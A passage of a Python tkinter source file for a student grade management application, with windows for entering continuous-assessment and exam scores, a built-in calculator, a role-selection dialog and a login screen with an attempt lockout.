response=messagebox.showinfo('OOPS', 'SCORE IS OVER')\r\n\r\n \r\ndef Window3():\r\n Reg4.destroy()\r\n root.withdraw()\r\n global Window3\r\n global Reg3\r\n global caE\r\n Reg5=Toplevel()\r\n Reg5.title(\"SUBJECT TEACHER\")\r\n Reg5.iconbitmap(\"favico.ico\")\r\n Reg5.resizable(width=False, height=False)\r\n Reg5.geometry(\"1270x650+0+0\")\r\n #Reg2.overrideredirect(True)\r\n #Reg2.transient(1)\r\n #Reg2.protocol(\"WM_DELETE_WINDOW\", CancelCommand)\r\n Reg5.config(bg=\"#77c593\")\r\n #===========sliders====================\r\n global my_canvas\r\n main_frame= Frame(Reg5,)\r\n main_frame.pack(side=RIGHT,fill=BOTH, expand=1)#pady=20\r\n my_canvas= Canvas(main_frame,width=200,height=400)\r\n my_canvas.pack(side=LEFT,fill=BOTH, expand =1)\r\n my_scrollbar=Scrollbar(main_frame, orient=VERTICAL,command=my_canvas.yview)\r\n my_scrollbar.pack(side=RIGHT ,fill=Y)\r\n \r\n my_canvas.configure(yscrollcommand=my_scrollbar.set)\r\n my_canvas.bind('', lambda e:my_canvas.configure(scrollregion=my_canvas.bbox(\"all\")))\r\n student_info1=Frame(my_canvas, pady=5,bg=\"#EDEBFF\")\r\n my_canvas.create_window((0,0), window=student_info1, anchor=\"nw\")\r\n my_scrollbar1=Scrollbar(student_info1, orient=HORIZONTAL,command=my_canvas.xview)\r\n my_scrollbar1.pack(side=BOTTOM ,fill=X)#place(x=2, y=410, fill=X)place(x=2, y=410)\r\n my_canvas.configure(xscrollcommand=my_scrollbar1.set)\r\n my_canvas.bind('', lambda e:my_canvas.configure(scrollregion=my_canvas.bbox(\"all\")))\r\n #==========================slider down=================================================\r\n #main_frame1= Frame(Reg5)\r\n #main_frame1.place(x=1, y=1)\r\n #my_canvas1= Canvas(main_frame1,width=873,height=406)\r\n #my_canvas1.pack(side=TOP,fill=BOTH, expand =1)\r\n #my_scrollbar1.pack(side=BOTTOM ,fill=X)#place(x=2, y=410)#pack(side=BOTTOM ,fill=Y)\r\n #my_canvas1.configure(yscrollcommand=my_scrollbar1.set)\r\n #my_canvas1.bind('', lambda e:my_canvas1.configure(scrollregion=my_canvas1.bbox(\"all\")))\r\n #student_info11=Frame(my_canvas1, pady=5,bg=\"#FFF8DC\")\r\n #my_canvas1.create_window((0,0), window=student_info1, anchor=\"nw\")\r\n #=========================top===================================\r\n student_info=Frame(student_info1, pady=5,bg=\"#EDEBFF\", relief=FLAT,bd=12)\r\n #student_info111=Frame(student_info11, pady=5,bg=\"#FFF8DC\", relief=FLAT,bd=12)\r\n \r\n student_info.pack(side= TOP)\r\n # student_info111.pack()\r\n\r\n #my_canvas.create_window((0,0), window=student_info, anchor=\"nw\")\r\n my_menu=Menu(Reg5)\r\n Reg5.config(menu=my_menu)\r\n\r\n\r\n file_menu=Menu(my_menu)\r\n my_menu.add_cascade(label=\"file\",menu=file_menu)\r\n file_menu.add_command(label=\"New\")\r\n file_menu.add_separator()\r\n file_menu.add_command(label=\"open\")\r\n\r\n\r\n \r\n tool_menu=Menu(my_menu)\r\n my_menu.add_cascade(label=\"tools\",menu=file_menu)\r\n tool_menu.add_command(label=\"copy\")\r\n tool_menu.add_separator()\r\n tool_menu.add_command(label=\"cut\")\r\n fil_img1=PhotoImage(file=\"studentsss.png\")\r\n fil_img2= Label(student_info, image=fil_img1)\r\n fil_img2.pack(side=LEFT)\r\n lblTitle1= Label(student_info,width=30,height=1, text=\"student grade mangement system\",fg=\"#3B3434\",bg=\"#EDEBFF\", relief=FLAT,\r\n font=(\"chiller\",75,\"bold\"),justify=CENTER) \r\n lblTitle1.pack(side=RIGHT)\r\n\r\n\r\n #++++++++++++++++++++++++++++++++++++\r\n global subject_name\r\n\r\n subject_name=StringVar()\r\n subject_info2=Frame(Reg5,bg=\"#38ACC0\", relief=RIDGE, bd=2)\r\n\r\n student_info3=Frame(subject_info2,relief=FLAT, bd=1, 
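Window3 above uses the standard tkinter recipe for a scrollable area: a Canvas paired with a Scrollbar, an inner Frame attached via create_window, and the scrollregion refreshed from bbox("all"). The empty event strings in the script's my_canvas.bind('') calls were presumably "<Configure>" before the angle-bracketed text was stripped. A minimal runnable sketch:

from tkinter import *

root = Tk()
canvas = Canvas(root, width=200, height=150)
canvas.pack(side=LEFT, fill=BOTH, expand=1)
sb = Scrollbar(root, orient=VERTICAL, command=canvas.yview)
sb.pack(side=RIGHT, fill=Y)
canvas.configure(yscrollcommand=sb.set)

inner = Frame(canvas)
canvas.create_window((0, 0), window=inner, anchor="nw")
for i in range(30):
    Label(inner, text=f"row {i}").pack()

# recompute the scrollable extent whenever the inner frame changes size
inner.bind("<Configure>", lambda e: canvas.configure(scrollregion=canvas.bbox("all")))
root.mainloop()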
borderwidth=0)\r\n social_lb1=Frame(student_info3, relief=FLAT,bd=2)\r\n fil_img=PhotoImage(file=\"file.png\")\r\n fil_btn=Button(social_lb1, image=fil_img,borderwidth=0)\r\n fil_btn.grid(row=0, column=0)\r\n \r\n lbl1=Label(social_lb1,width=10, text=\"new\",font=(\"chiller\", 25,'bold'))\r\n lbl1.grid(row=0, column=1)\r\n\r\n open_img=PhotoImage(file=\"file.png\")\r\n open_btn=Button(social_lb1, image=fil_img,borderwidth=0)\r\n open_btn.grid(row=1, column=0)\r\n \r\n lbl11=Label(social_lb1,width=10, text=\"open\",font=(\"chiller\", 25,'bold'))\r\n lbl11.grid(row=1, column=1)\r\n\r\n social_lb1.pack(side=TOP)\r\n \r\n social_lb3 = Frame(student_info3)\r\n lbl3=Label(social_lb3,width=10, text=\"subject\",font=(\"chiller\", 25,'bold'))\r\n lbl3.pack()\r\n sub3 = Entry(social_lb3 , textvariable=subject_name)\r\n sub3.pack()\r\n\r\n lbl4=Label(social_lb3,width=10, text=\"student no.\",font=(\"chiller\", 25,'bold'))\r\n lbl4.pack(padx=3)\r\n sub4 = Entry(social_lb3 )\r\n sub4.pack()\r\n\r\n social_lb3.pack()\r\n\r\n\r\n\r\n\r\n #sub11.pack(pady=10,ipady=13)\r\n social_lb11=Frame(student_info3)\r\n sub1 = Label(social_lb11, text=\"for more enquires, \\ncomplaints\", font=(\"chiller\", 25,'bold'))\r\n sub1.pack()\r\n fb_img=PhotoImage(file=\"iconfinder_facebook_834722.png\")\r\n fb_btn=Button(social_lb11, image=fb_img,borderwidth=0)\r\n fb_btn.pack(side=LEFT, padx=12)\r\n fb_im=PhotoImage(file=\"tw2.png\")\r\n fb_btn1=Button(social_lb11, image=fb_im,borderwidth=0)\r\n fb_btn1.pack(side=LEFT, padx=12)\r\n tw_im=PhotoImage(file=\"iconfinder_11-linkedin_104493.png\")\r\n tw_btn1=Button(social_lb11, image=tw_im,borderwidth=0)\r\n tw_btn1.pack(side=LEFT, padx=12)\r\n social_lb11.pack(pady=85)\r\n\r\n \r\n \r\n\r\n social_lb=Frame(student_info3)\r\n sub2 = Label(social_lb, text=\"Screen Copyright©\", font=(\"chiller\", 25,'bold'))\r\n sub2.pack(side=BOTTOM)\r\n \r\n social_lb.pack(side=BOTTOM, pady=85)\r\n\r\n\r\n\r\n\r\n student_info3.pack()\r\n subject_info2.pack(side=LEFT)\r\n\r\n #====================== left(subject info)===================================\r\n subject_info=Frame(student_info1,bg=\"#38ACC0\", relief=FLAT,bd=2)\r\n subject_info.pack(side=LEFT)\r\n #---------------------------------\r\n pos1 =[\"1st\",\"2nd\",\"3rd\",\"4th\",\"5th\",\"6th\",\"7th\",\"8th\",\"9th\",\"10th\",\"11th\",\"12th\",\"13th\",\"14th\",\"15th\",\"16th\",\"17th\",\"18th\",\"19th\",\"20th\",\r\n \"21st\",\"22nd\",\"23rd\",\"24th\",\"25th\",\"26th\",\"27th\",\"28th\",\"29th\",\"30th\",\"31st\",\"32nd\",\"33rd\",\"34th\",\"35th\",\"36th\",\"37th\",\"38th\",\"39th\",\"40th\",\r\n \"41st\",\"42nd\",\"43rd\",\"44th\",\"45th\",\"46th\",\"47th\",\"48th\",\"49th\",\"50th\",\"51st\",\"52nd\",\"53rd\",\"54th\",\"55th\",\"56th\",\"57th\",\"58th\",\"59th\",\"60th\"]\r\n term2=[\"1st\",\"2nd\",\"3rd\"]\r\n position1=StringVar()\r\n term1=StringVar()\r\n student_F=Frame(subject_info,bd=6,bg=\"#38ACC0\")\r\n student_F.configure(height=260, width=100)\r\n student_F.pack(side=TOP)\r\n #subject_f.place\r\n txtfn=Label(student_F,height=1,relief=FLAT,bg=\"#38ACC0\", width=12,text=\"First name \",font=(\"Harlow Solid Italic\", 20,'bold'))\r\n txtfn.grid(row=0,column=0,sticky=W)\r\n txtln=Label(student_F,height=1,width=12,relief=FLAT,bg=\"#38ACC0\",text=\"Other name\",font=(\"Harlow Solid Italic\", 20,'bold'))\r\n txtln.grid(row=1,column=0,sticky=W)\r\n \r\n #pos3=Label(student_f,relief=RIDGE, width=12,text=\"position\", bd=4,font=(\"helvetica\", 20,'bold'))\r\n #pos3.grid(row=2,column=0)\r\n global f_name\r\n global L_name\r\n global 
ca_ttl\r\n\r\n global avg\r\n global cle_ttl\r\n global pos2\r\n global term4\r\n\r\n f_name=StringVar()\r\n L_name=StringVar()\r\n ca_ttl=StringVar()\r\n \r\n avg=StringVar()\r\n cle_ttl=StringVar()\r\n\r\n global LBfn\r\n global LBln\r\n global LBET\r\n\r\n LBfn=Entry(student_F, width=25, bg =\"#E9DBDB\",font=(\"helvetica\", 15,'bold'),textvariable=f_name)\r\n LBfn.grid(row=0,column=1,ipady=3)\r\n LBln=Entry(student_F, width=25, bg =\"#E9DBDB\" ,font=(\"helvetica\", 15,'bold'),textvariable=L_name)\r\n LBln.grid(row=1,column=1,ipady=3)\r\n \r\n \r\n global LBCT\r\n \r\n global click6\r\n global click7\r\n global pos2\r\n global term4\r\n click6 =StringVar()\r\n click7= StringVar()\r\n \r\n \r\n #pos2= ttk.Combobox(student_F, value=pos1,width=23,font=(\"helvetica\", 10,'bold'))\r\n #pos2.current(0)\r\n #pos2.grid(row=4,column=1,ipady=5)\r\n term3=Label(student_F,relief=FLAT, width=12,text=\"Term\",bg=\"#38ACC0\",font=(\"Harlow Solid Italic\", 20,'bold'))\r\n #term3=Label(student_F,relief=RIDGE, width=12,text=\"term\",bg=\"#38ACC0\",font=(\"helvetica\", 20,'bold'))\r\n term3.grid(row=3,column=0,sticky=W)\r\n term4= ttk.Combobox(student_F, value=term2,width=23,font=(\"helvetica\", 14,'bold'))\r\n term4.current(0)\r\n term4.grid(row=3,column=1,ipady=5)\r\n \r\n \r\n global LBremark\r\n global avge\r\n avge = StringVar()\r\n \r\n \r\n global LBCAT\r\n \r\n \r\n \r\n\r\n \r\n #==========================================================================\r\n global var1\r\n global var2\r\n global var3\r\n global var4\r\n global var5\r\n global ca1\r\n global ca2\r\n global ca3\r\n global ca4\r\n global exams\r\n var1=IntVar()\r\n var2=IntVar()\r\n var3=IntVar()\r\n var4=IntVar()\r\n var5=IntVar()\r\n scores=Frame(subject_info,bd=10,bg=\"#38ACC0\", relief=FLAT)\r\n scores.pack(side=LEFT)\r\n \r\n ca1=Checkbutton(scores, text=\"First C.A\", bg=\"#38ACC0\",variable=var1, onvalue=1,offvalue=0,font=(\"Arial Rounded MT Bold\",20,\"bold\"), command=checkca1)\r\n ca1.grid(row=0,sticky=W)\r\n ca2=Checkbutton(scores, text=\"Second C.A\",bg=\"#38ACC0\", variable=var2, onvalue=1,offvalue=0,font=(\"Arial Rounded MT Bold\",20,\"bold\"), command=checkca2)\r\n ca2.grid(row=1,sticky=W)\r\n ca3=Checkbutton(scores, text=\"Third C.A\", bg=\"#38ACC0\",variable=var3, onvalue=1,offvalue=0,font=(\"Arial Rounded MT Bold\",20,\"bold\"), command=checkca3)\r\n ca3.grid(row=2,sticky=W)\r\n ca4=Checkbutton(scores, text=\"Fourth C.A\",bg=\"#38ACC0\", variable=var4, onvalue=1,offvalue=0,font=(\"Arial Rounded MT Bold\",20,\"bold\"), command=checkca4)\r\n ca4.grid(row=3,sticky=W)\r\n exams=Checkbutton(scores, text=\"Examination\",bg=\"#38ACC0\", variable=var5, onvalue=1,offvalue=0,font=(\"Arial Rounded MT Bold\",20,\"bold\"), command=checkca5)\r\n exams.grid(row=4,sticky=W)\r\n txtCT=Label(scores,relief=FLAT,height=1, width=12,bg=\"#38ACC0\",text=\"CA total\",justify=RIGHT, font=(\"Arial Rounded MT Bold\", 20,'bold'))\r\n txtCT.grid(row=5,sticky=W)\r\n \r\n pos3=Label(scores,relief=FLAT, width=12,height=1,bg=\"#38ACC0\",text=\"Position\",font=(\"Arial Rounded MT Bold\", 20,'bold'))\r\n pos3.grid(row=7,sticky=W)\r\n CATlb=Label(scores,relief=FLAT, width=12,bg=\"#38ACC0\",text=\"Total scores\", bd=4,font=(\"Arial Rounded MT Bold\", 20,'bold'))\r\n CATlb.grid(row=8,sticky=W)\r\n\r\n txtET=Label(scores, width=12,relief=FLAT,height=1,bg=\"#38ACC0\",text=\"grade\", font=(\"Arial Rounded MT Bold\", 20,'bold'))\r\n txtET.grid(row=9,column=0,sticky=W)\r\n avelb=Label(scores,relief=FLAT, width=12,bg=\"#38ACC0\",text=\"Remark\", 
bd=4,font=(\"Arial Rounded MT Bold\", 20,'bold'))\r\n avelb.grid(row=10,sticky=W,pady=11)\r\n #=========================================\r\n global ca11\r\n global ca22\r\n global ca33\r\n global ca44\r\n global ex1\r\n global ca1E\r\n global ca2E\r\n global ca3E\r\n global ca4E\r\n global ca5E\r\n ex1=IntVar()\r\n ca44=IntVar()\r\n ca33=IntVar()\r\n ca11=IntVar()\r\n ca22=IntVar()\r\n grades=Frame(subject_info,bd=10,relief=FLAT,bg=\"#38ACC0\")\r\n grades.pack(side=RIGHT)\r\n \r\n ca1E=Entry(grades, relief =FLAT, bd=3,bg=\"#E9DBDB\" ,justify=\"center\",font=(\"helvetica\", 20,'bold'), state=DISABLED,textvariable=ca11)\r\n ca1E.grid(row=0, sticky=W,ipady=5)\r\n ca2E=Entry(grades, relief =FLAT, bd=3,bg=\"#E9DBDB\", justify=\"center\",font=(\"helvetica\", 20,'bold'), state=DISABLED,textvariable=ca22)\r\n ca2E.grid(row=1, sticky=W,ipady=2)\r\n ca3E=Entry(grades, relief =FLAT, bd=3,bg=\"#E9DBDB\", justify=\"center\",font=(\"helvetica\", 20,'bold'), state=DISABLED,textvariable=ca33)\r\n ca3E.grid(row=2, sticky=W,ipady=2)\r\n ca4E=Entry(grades, relief =FLAT, bd=3,bg=\"#E9DBDB\", justify=\"center\",font=(\"helvetica\", 20,'bold'), state=DISABLED,textvariable=ca44)\r\n ca4E.grid(row=3, sticky=W,ipady=2)\r\n ca5E=Entry(grades, relief =FLAT, bd=3,bg=\"#E9DBDB\", justify=\"center\",font=(\"helvetica\", 20,'bold'), state=DISABLED,textvariable=ex1)\r\n ca5E.grid(row=4, sticky=W,ipady=3)\r\n LBCT=Entry(grades, bg =\"#E9DBDB\",width=19,font=(\"helvetica\", 21,'bold'),textvariable=ca_ttl)\r\n LBCT.grid(row=5,sticky=W,ipady=2)\r\n \r\n pos2= ttk.Combobox(grades, value=pos1,width=41,font=(\"helvetica\", 9,'bold'))\r\n pos2.current(0)\r\n pos2.grid(row=7,sticky=W,ipady=5,pady=2)\r\n LBCAT=Entry(grades, bg =\"#E9DBDB\",width=19,font=(\"helvetica\", 21,'bold'),textvariable=cle_ttl)\r\n global LBET\r\n LBCAT.grid(row=8,sticky=W,ipady=2)\r\n LBET=Entry(grades, bg =\"#E9DBDB\",width=19,font=(\"helvetica\", 21,'bold'))\r\n LBET.grid(row=9,sticky=W,ipady=2, pady=2)#column=1,\r\n LBremark=Entry(grades, bg =\"#E9DBDB\",width=19,font=(\"helvetica\", 21,'bold'),textvariable=avge)\r\n LBremark.grid(row=10,sticky=W,ipady=2,pady=8)\r\n\r\n #````````````````````````````````\r\n\r\n #pos1 =[\"1st\",\"2nd\",\"3rd\",\"4th\",\"5th\",\"6th\",\"7th\",\"8th\",\"9th\",\"10th\",\"11th\",\"12th\",\"13th\",\"14th\",\"15th\",\"16th\",\"17th\",\"18th\",\"19th\",\"20th\",\r\n #\"21st\",\"22nd\",\"23rd\",\"24th\",\"25th\",\"26th\",\"27th\",\"28th\",\"29th\",\"30th\",\"31st\",\"32nd\",\"33rd\",\"34th\",\"35th\",\"36th\",\"37th\",\"38th\",\"39th\",\"40th\",\r\n #\"41st\",\"42nd\",\"43rd\",\"44th\",\"45th\",\"46th\",\"47th\",\"48th\",\"49th\",\"50th\",\"51st\",\"52nd\",\"53rd\",\"54th\",\"55th\",\"56th\",\"57th\",\"58th\",\"59th\",\"60th\"]\r\n #position1=StringVar()\r\n\r\n \r\n subject_f=Frame(student_info1, relief=FLAT, bd=1)\r\n subject_f.place(x=5,y=585)\r\n\r\n #============================right(display options)=============================\r\n display=Frame(student_info1, relief=FLAT,bd=1,bg=\"#7a2048\")\r\n display.pack(side= RIGHT)\r\n \r\n #-------------buttons frame---------------------------------------\r\n Button_f=Frame(display,relief=FLAT,bd=5, bg=\"#7a2048\")\r\n Button_f.pack(side=BOTTOM)\r\n Button_ff=Frame(Button_f, bd=1 ,height =1,bg=\"#7a2048\")\r\n Button_ff.pack()\r\n Button_fff=LabelFrame(Button_f,bd=4,bg=\"#7a2048\")\r\n Button_fff.pack()\r\n global horiz\r\n global vert\r\n global txtdisplay\r\n txtdisplay=Text(Button_ff, bg =\"#E9DBDB\", bd=1,font=(\"helvetica\", 8,'bold'),wrap=\"none\" )\r\n 
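# Two-way scrollbar wiring for the report display: each Scrollbar drives the Text view through its command=...view callback, and the Text widget keeps the bars in sync via yscrollcommand/xscrollcommand.\r\n    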
txt_scrollbar=Scrollbar(Button_ff, orient=VERTICAL,command=txtdisplay.yview)\r\n txt_scrollbar.pack(side=RIGHT ,fill=Y)\r\n \r\n txtdisplay.configure(yscrollcommand=txt_scrollbar.set)\r\n txt1_scrollbar1=Scrollbar(Button_ff, orient=HORIZONTAL,command=txtdisplay.xview)\r\n txt1_scrollbar1.pack(side=BOTTOM ,fill=X)\r\n \r\n txtdisplay.configure(xscrollcommand=txt1_scrollbar1.set)\r\n #horiz=Scrollbar(txtdisplay,height=25)\r\n #horiz.config(command=txtdisplay.yview)\r\n #horiz.pack(anchor=E, fill=Y)\r\n #vert=Scale(txtdisplay, from_=0, to=100000,width=125, command=slide)\r\n #txtdisplay.insert(1.0, \"\\nFIRST NAME\\t\\t\" + \"LAST NAME\\t\\t\\t\" + \"1st C.A\\t\\t\"+ \"2nd C.A\\t\\t\"+ \"3rd C.A\\t\\t\"+ \"4th C.A\\t\\t\"+ \"C.A total\\t\\t\"+ \"Exam total\\t\\t\"+ \"average\\t\\t\")\r\n txtdisplay.configure(height=21,width=125)\r\n txtdisplay.pack()#grid(row=0,column=0,sticky=W)\r\n btntotal=Button(Button_fff,bg=\"#ecc19c\",relief=RIDGE, text=\"reset\", bd=3,font=(\"helvetica\", 20,'bold'),command=reset)\r\n btntotal.grid(row=1,column=0)\r\n btntotal=Button(Button_fff,relief =RIDGE,bg=\"#1e847f\", text=\"save\", bd=3,font=(\"helvetica\", 20,'bold'))\r\n btntotal.grid(row=1,column=1)\r\n btntotal=Button(Button_fff,relief =RIDGE,bg=\"#d9a5b3\", text=\"total\",bd=3,font=(\"helvetica\", 20,'bold'), command=total) \r\n btntotal.grid(row=1,column=2)\r\n btntotal=Button(Button_fff,relief =RIDGE,bg=\"#d9a5b3\", text=\"print\",bd=3,font=(\"helvetica\", 20,'bold'))\r\n btntotal.grid(row=1,column=4)\r\n btnfinish=Button(Button_fff,bg=\"#ecc19c\",relief=RIDGE, text=\"finish\", bd=3,font=(\"helvetica\", 20,'bold'),command= finish)\r\n btnfinish.grid(row=1,column=3)\r\n #````````````````````````````````````````````\r\n global text_Input\r\n text_Input=StringVar()\r\n calf=Frame(display,relief=RIDGE,bg=\"#7a2048\")\r\n calf.pack(side=TOP)\r\n caE=Entry(calf,width=55,bg=\"#E9DBDB\",bd=4, font=(\"arial\",12,\"bold\"),justify=RIGHT,textvariable=text_Input)\r\n caE.grid(row=0,column=0,columnspan=4,ipady=3,pady=1)\r\n caE.insert(0,\"0\")\r\n #============calculator buttons===================\r\n global btn7\r\n btn7=Button(calf,text=\"7\",relief=RIDGE,bd=3,width=12,pady=1,fg=\"black\",bg=\"#CEA642\", font=(\"arial\",15,\"bold\"), command=lambda:button_click(7))\r\n btn7.grid(row=2,column=0)\r\n btn8=Button(calf,text=\"8\",pady=1,width=12,relief=RIDGE,bd=3,fg=\"black\",bg=\"#CEA642\", font=(\"arial\",15,\"bold\"), command=lambda:button_click(8))\r\n btn8.grid(row=2,column=1)\r\n btn9=Button(calf,text=\"9\",pady=1,fg=\"black\",width=12,relief=RIDGE,bd=3,bg=\"#CEA642\", font=(\"arial\",15,\"bold\"), command=lambda:button_click(9))\r\n btn9.grid(row=2,column=2)\r\n btnadd=Button(calf,text=\"+\",pady=1,fg=\"black\",width=12,relief=RIDGE,bd=3,bg=\"#CEA642\", font=(\"arial\",15,\"bold\"),command=button_add)\r\n btnadd.grid(row=2,column=3)\r\n\r\n\r\n btn4=Button(calf,text=\"4\",relief=RIDGE,bd=3,pady=1,fg=\"black\", width=12,bg=\"#E9DBDB\",font=(\"arial\",15,\"bold\"), command=lambda:button_click(4))\r\n btn4.grid(row=3,column=0)\r\n btn5=Button(calf,text=\"5\",pady=1,fg=\"black\",relief=RIDGE,bd=3, width=12,bg=\"#E9DBDB\",font=(\"arial\",15,\"bold\"), command=lambda:button_click(5))\r\n btn5.grid(row=3,column=1)\r\n btn6=Button(calf,text=\"6\",pady=1,fg=\"black\",relief=RIDGE,bd=3, width=12,bg=\"#E9DBDB\",font=(\"arial\",15,\"bold\"), command=lambda:button_click(6))\r\n btn6.grid(row=3,column=2)\r\n btnsub=Button(calf,text=\"-\",pady=1,fg=\"black\",width=12,relief=RIDGE,bd=3,bg=\"#CEA642\", 
font=(\"arial\",15,\"bold\"),command=button_substract)\r\n btnsub.grid(row=3,column=3)\r\n\r\n\r\n btn1=Button(calf,text=\"1\",pady=1,fg=\"black\",relief=RIDGE,bd=3,bg=\"#E9DBDB\", width=12,font=(\"arial\",15,\"bold\"), command=lambda:button_click(1))\r\n btn1.grid(row=4,column=0)\r\n btn2=Button(calf,text=\"2\",pady=1,fg=\"black\", relief=RIDGE,bd=3,bg=\"#E9DBDB\",width=12,font=(\"arial\",15,\"bold\"), command=lambda:button_click(2))\r\n btn2.grid(row=4,column=1)\r\n btn3=Button(calf,text=\"3\",pady=1,fg=\"black\",width=12,relief=RIDGE,bd=3,bg=\"#E9DBDB\", font=(\"arial\",15,\"bold\"), command=lambda:button_click(3))\r\n btn3.grid(row=4,column=2)\r\n btnmul=Button(calf,text=\"*\",pady=1,fg=\"black\",relief=RIDGE,bd=3, width=12,bg=\"#CEA642\",font=(\"arial\",15,\"bold\"), command=button_multiply)\r\n btnmul.grid(row=4,column=3)\r\n\r\n\r\n btndiv=Button(calf,text=\"/\",pady=1,fg=\"black\",relief=RIDGE,bd=3,width=12,bg=\"#CEA642\", font=(\"arial\",15,\"bold\"), command=button_divide)\r\n btndiv.grid(row=5,column=0)\r\n btnz=Button(calf,text=\"0\",pady=1,fg=\"black\",relief=RIDGE,bd=3,width=12,bg=\"#CEA642\", font=(\"arial\",15,\"bold\"), command=lambda:button_click(0))\r\n btnz.grid(row=5,column=1)\r\n btne=Button(calf,text=\"=\",width=12,pady=1,relief=RIDGE,bd=3,fg=\"black\",bg=\"#CEA642\", font=(\"arial\",15,\"bold\"),command=button_equals)\r\n btne.grid(row=5,column=2)\r\n btnclr=Button(calf,text=\"clr\",width=12,pady=1,relief=RIDGE,bd=3,fg=\"black\", bg=\"#CEA642\",font=(\"arial\",15,\"bold\"),command=button_clears)\r\n btnclr.grid(row=5,column=3)\r\n #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n #regf=Frame(display,relief=RIDGE,bd=4)\r\n #regf.pack(side=BOTTOM)\r\n Reg5.mainloop() \r\n\r\ndef Window4():\r\n Reg4.destroy()\r\n root.withdraw()\r\n global Window4\r\n global Reg6\r\n Reg6=Toplevel()\r\n Reg6.title(\"FORM-MASTER/MISTRESS\")\r\n Reg6.iconbitmap(\"favico.ico\")\r\n Reg6.resizable(width=False, height=False)\r\n Reg6.geometry(\"300x300\")\r\n #Reg2.overrideredirect(True)\r\n #Reg2.transient(1)\r\n #Reg2.protocol(\"WM_DELETE_WINDOW\", CancelCommand)\r\n Reg6.config(bg=\"white\")\r\n Reg6.mainloop()\r\ndef options():\r\n global Reg4\r\n global options\r\n global clicked\r\n global r\r\n global Variable\r\n Reg4=Toplevel(root)\r\n Reg4.title(\"WELCOME\")\r\n Reg4.iconbitmap(\"favico.ico\")\r\n Reg4.resizable(width=False, height=False)\r\n #Reg4.geometry(\"350x150\")\r\n #Reg2.overrideredirect(True)\r\n #Reg2.transient(1)\r\n #Reg2.protocol(\"WM_DELETE_WINDOW\", CancelCommand)\r\n Reg4.config(bg=\"#B0E0E6\")\r\n r = IntVar()\r\n r.get()\r\n rad1=Radiobutton(Reg4, text=\"formmaster/mistress\",bg=\"#B0E0E6\",font=(\"arial\", 8,\"bold\"),variable=r, value=1,command=lambda:(1))\r\n rad2=Radiobutton(Reg4, text=\"subject teacher\",bg=\"#B0E0E6\", font=(\"arial\", 8,\"bold\"),variable=r, value=2,command=lambda:(2))\r\n rad1.pack(anchor=W)\r\n rad2.pack(anchor=W)\r\n btnRAD= Button(Reg4, text=\"next>>>\",bg=\"#B0E0E6\",bd=1,command=lambda: rad3(r.get()))# \r\n btnRAD.pack(anchor=W)\r\n\r\n btncancel= Button(Reg4, text=\"cancel\",bg=\"#B0E0E6\",bd=1,command=cancel)#bg=\"white\", \r\n btncancel.pack(anchor=W)\r\n \r\n\r\n\r\ndef reg3():\r\n Reg2.destroy()\r\n #frame1.config(state='enabled')\r\n txtUsername.configure(state='normal') \r\n txtPassword.configure(state='normal')\r\n \r\n\r\n #========================buuttons=====================================\r\n\r\n btnReg.configure(state='normal')\r\n btnLgn.configure(state='normal')\r\n btnCp.configure(state='normal')\r\n 
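\r\n# Login lockout: after three failed attempts clock1() counts the 30-second wait down once per second via after(1000, clock1), then reg3() re-enables the disabled login widgets.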
\r\nclock=30 \r\ndef clock1():\r\n    global clock\r\n    clock=int(clock)-1\r\n    my_label.config(text=\"YOU HAVE ATTEMPTED THREE TIMES \\n sorry you have to wait \" + str(clock) + \" secs\")\r\n    if clock > 0:\r\n        my_label.after(1000, clock1)\r\n    else:\r\n        reg3()\r\n\r\ntimes = 5\r\ndef loginchecker():\r\n\r\n    \r\n    username1=username_verify.get()\r\n    password1=password_verify.get()\r\n\r\n\r\n    list_of_files=os.listdir('C:/Users/codei/Documents/ndaca')\r\n    def submit():\r\n        global my2\r\n        global Reg2\r\n        global my_label\r\n        global times\r\n        times=int(times)-1\r\n        if username1 in list_of_files:\r\n            file1 = open(username1, 'r')\r\n            verify =file1.read().splitlines()\r\n            \r\n            if password1 in verify:\r\n                response=messagebox.showinfo(\"LOGIN SUCCESSFUL\", \"you are going to the main page\")\r\n                if response==\"ok\":\r\n                    options()\r\n        elif times==2:\r\n            #frame1.disabled()\r\n            Reg2=Toplevel(root)\r\n            Reg2.title(\"please wait\")\r\n            Reg2.iconbitmap(\"favico.ico\")\r\n            Reg2.resizable(width=False, height=False)\r\n            Reg2.overrideredirect(True)\r\n            #Reg2.transient(1)\r\n            #Reg2.protocol(\"WM_DELETE_WINDOW\", CancelCommand)\r\n            Reg2.config(bg=\"white\")\r\n            #Reg2.geometry(\"250x80+0+0\")\r\n            txtUsername.configure(state='disabled')\r\n            \r\n            \r\n            txtPassword.configure(state='disabled')\r\n            \r\n\r\n            #========================buttons=====================================\r\n\r\n            btnReg.configure(state='disabled')\r\n            btnLgn.configure(state='disabled')\r\n            btnCp.configure(state='disabled')\r\n            \r\n            my2= Frame(Reg2, relief=RIDGE,bg=\"white\",bd=3)\r\n            my_label=Label(my2, text=\"\", bg=\"white\")\r\n            clock1()\r\n            my_label.pack(pady=20)\r\n            my2.pack()\r\n            \r\n            \r\n\r\n            \r\n\r\n            \r\n        elif times==0:\r\n            response=messagebox.askokcancel(\"OOPS\", 'sorry you have exceeded the number of trials \\n would you like to register')\r\n            if response==1:\r\n                Window2()\r\n            else:\r\n                root.destroy()\r\n        else:\r\n            response=messagebox.askokcancel('OOPS', 'you have ' + str(times) + \" attempts\" )\r\n            if response==1:\r\n                txtUsername.delete(0,'end')\r\n                txtPassword.delete(0, 'end')\r\n            else:\r\n                root.destroy()\r\n\r\n\r\n    submit()    \r\n    \r\n    \r\n\r\n\r\n\r\n\r\n\r\ndef Window1():\r\n    global btnReg\r\n    global btnLgn\r\n    global btnCp\r\n    global frame1\r\n    global root\r\n    root = Tk()\r\n    global username_verify\r\n    global password_verify\r\n    global txtUsername\r\n    global txtPassword\r\n\r\n    \r\n    #RegCP.destroy()\r\n    username_verify= StringVar()\r\n    password_verify=StringVar()\r\n    root.title(\"login screen\")\r\n    root.iconbitmap(\"favico.ico\")\r\n    root.resizable(width=False, height=False)\r\n    root.config(bg=\"white\")\r\n    #root.wm_attributes(\"-topmost\", True)\r\n    #root.wm_attributes(\"-disabled\", True)\r\n    #root.wm_attributes(\"-transparentcolor\", \"white\")\r\n    #====================================================================\r\n\r\n    \r\n    frame1=Frame(root, bg =\"white\", relief=RAISED)\r\n    frame1.pack()\r\n\r\n    logo2 = ImageTk.PhotoImage(Image.open(\"ndass2.jpg\"))\r\n\r\n\r\n\r\n    lblTitle=Label(frame1, image=logo2)\r\n    